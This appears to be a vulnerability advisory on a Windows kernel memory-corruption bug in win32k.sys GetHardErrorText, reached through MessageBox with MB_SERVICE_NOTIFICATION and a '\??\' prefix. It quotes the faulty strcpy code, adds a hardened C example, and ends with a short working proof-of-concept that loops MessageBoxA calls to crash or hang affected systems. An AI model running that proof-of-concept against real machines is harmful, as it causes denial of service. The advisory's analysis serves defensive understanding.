Memory Corruption on MessageBox with MB_SERVICE_NOTIFICATION and Question Marks
A message was published by NULL about a vulnerability in Windows when processing MessageBox() with the MB_SERVICE_NOTIFICATION flag and a message or caption beginning with \??\. The vulnerability appears to be memory corruption in the kernel and causes a system crash or hang after a few attempts. It seems to happen because the message is logged to the event log, which may point to a problem in event-log processing.

The problem is in the win32k.sys function GetHardErrorText, which tries to prepare EXCEPTION data for the event log, and appears to be a very old debugging feature accidentally left in production code since Windows 2000.

In Windows 2000 there is a piece of code like:

    } else if ((asLocal.Length > 4) && !_strnicmp(asLocal.Buffer, "\\??\\", 4)) {
        strcpy( asLocal.Buffer, asLocal.Buffer+4 );

Two things are wrong with that copy. strcpy is called with overlapping source and destination, which is undefined behaviour, and it copies until it finds a NUL rather than stopping at asLocal.Length; a counted string handed in by the caller is not guaranteed to carry a terminator inside its allocation, so the copy can run past the end of the buffer. Length is also left at its old value. In user mode that would be a bug; in win32k.sys it is kernel memory corruption, which would explain the crashes and hangs observed.
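The following is an added example, not code from the advisory or from Windows, showing the same prefix-stripping step done on a counted string without the strcpy hazards. The counted_string struct is an assumed stand-in for the kernel's ANSI_STRING layout (Length in bytes, no terminator guaranteed), the input is constructed from the advisory's "\??\XXXX" string, and everything runs in user mode with any C99 compiler:

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Stand-in for the kernel's counted ANSI_STRING (assumed layout, not the
 * real NT definition): Length is the number of bytes in the string, not
 * counting any terminator, and Buffer is not guaranteed to carry one. */
typedef struct {
    uint16_t Length;
    uint16_t MaximumLength;
    char    *Buffer;
} counted_string;

/* Same test as the quoted fragment: more than 4 bytes and a leading "\??\".
 * The prefix contains no letters, so memcmp is equivalent to _strnicmp here. */
int has_nt_prefix(const counted_string *s)
{
    return s->Length > 4 && memcmp(s->Buffer, "\\??\\", 4) == 0;
}

/* The pattern from the quoted Windows 2000 fragment, kept for contrast.
 * strcpy over overlapping memory is undefined behaviour, and it keeps copying
 * until it meets a NUL, which a counted string does not promise to hold
 * inside its allocation; Length is also never adjusted. Not called below. */
void strip_nt_prefix_unsafe(counted_string *s)
{
    if (has_nt_prefix(s))
        strcpy(s->Buffer, s->Buffer + 4);
}

/* Hardened form: bounded by Length, overlap-safe, and keeps Length in sync.
 * Returns 1 if a prefix was removed, 0 if the string was left untouched. */
int strip_nt_prefix_safe(counted_string *s)
{
    if (!has_nt_prefix(s))
        return 0;
    uint16_t remaining = (uint16_t)(s->Length - 4);
    memmove(s->Buffer, s->Buffer + 4, remaining);
    s->Length = remaining;
    /* Scrub the vacated tail so nothing downstream sees stale prefix bytes. */
    memset(s->Buffer + remaining, 0, 4);
    return 1;
}

int main(void)
{
    /* Constructed input: the advisory's "\??\XXXX" with no terminator
     * anywhere in the 16-byte allocation, exactly where strcpy would overrun. */
    char buf[16];
    memset(buf, 'A', sizeof buf);
    memcpy(buf, "\\??\\XXXX", 8);
    counted_string s = { 8, sizeof buf, buf };

    if (strip_nt_prefix_safe(&s))
        printf("stripped: %.*s (Length=%u)\n",
               (int)s.Length, s.Buffer, (unsigned)s.Length);
    return 0;
}
```

Note that the original check is Length > 4, so a string that is exactly "\??\" is left alone in both versions; the safe version only differs in never reading or writing beyond Length.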

Exploit:

#include <windows.h>

/* Build with a Windows C compiler and link against user32, e.g.
   cl bug.c user32.lib. MessageBoxA is named explicitly so the char buffer
   is passed unchanged under both ANSI and UNICODE builds. */
int main(void)
{
    int i;
    /* Message and caption both start with the "\??\" prefix that
       GetHardErrorText strips. */
    char bug1[] = "\\??\\XXXX";

    /* With MB_SERVICE_NOTIFICATION the box is delivered as a hard error,
       which is what reaches GetHardErrorText; a few iterations are enough
       to crash or hang an affected system. */
    for (i = 0; i < 10; i++)
    {
        MessageBoxA(0, bug1, bug1, MB_SERVICE_NOTIFICATION);
    }
    return 0;
}